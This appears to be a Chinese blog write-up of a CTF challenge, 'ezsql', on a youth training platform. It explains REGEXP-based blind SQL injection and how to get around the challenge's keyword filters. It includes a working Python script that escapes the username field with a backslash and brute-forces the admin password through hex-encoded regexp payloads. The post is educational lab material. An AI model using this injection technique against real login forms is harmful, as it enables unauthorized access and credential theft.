CTF每日练习之“ezsql“-regexp注入

CTF每日练习之"ezsql"

青少年CTF训练平台
传送门:青少年CTF训练平台

在这里插入图片描述

regexp注入

提示:regexp盲注
文章传送:REGEXP注入与LIKE注入学习笔记
REGEXP注入,即regexp正则表达式注入。REGEXP注入,又叫盲注值正则表达式攻击。
应用场景就是盲注,原理是直接查询自己需要的数据,然后通过正则表达式进行匹配。

正则表达式:
用来检查一个字符串是否含有某个子字符串,将匹配的子字符串做替换或者从某个字符串中取出符合某个条件的子串等,前端往往有大量的表单数据校验工作,采用正则表达式会使得数据校验的工作量大大减轻。常用效果:邮箱、手机号、身份证号等

漏洞复现

提示:regexp盲注
在这里插入图片描述

通过尝试发现过滤了select、union、'、"、、=、like、and等
利用regexp进行匹配猜测数据,还需要用binary关键字来区分大小写

import requests

import string


def str2hex(string):
    result = ''

    for i in string:
        result += hex(ord(i))

    result = result.replace('0x', '')

    return '0x' + result


strs = string.ascii_letters + string.digits

url = "http://b860d0fe-b343-4945-85e3-8dda6ca2ae83.challenge.qsnctf.com:8081/login.php"

headers = {

    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0'

}

payload = 'or password regexp binary {}#'

if __name__ == "__main__":

    name = ''

    for i in range(1, 40):

        for j in strs:

            passwd = str2hex('^' + name + j)

            payloads = payload.format(passwd)

            postdata = {

                'username': 'admin\\',

                'password': payloads

            }

            r = requests.post(url, data=postdata, headers=headers)

            if "Maybe you are right" in r.text:
                name += j

                print(j, end='')

                break

破解密码
拿到flag
在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

是liku不是里库

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值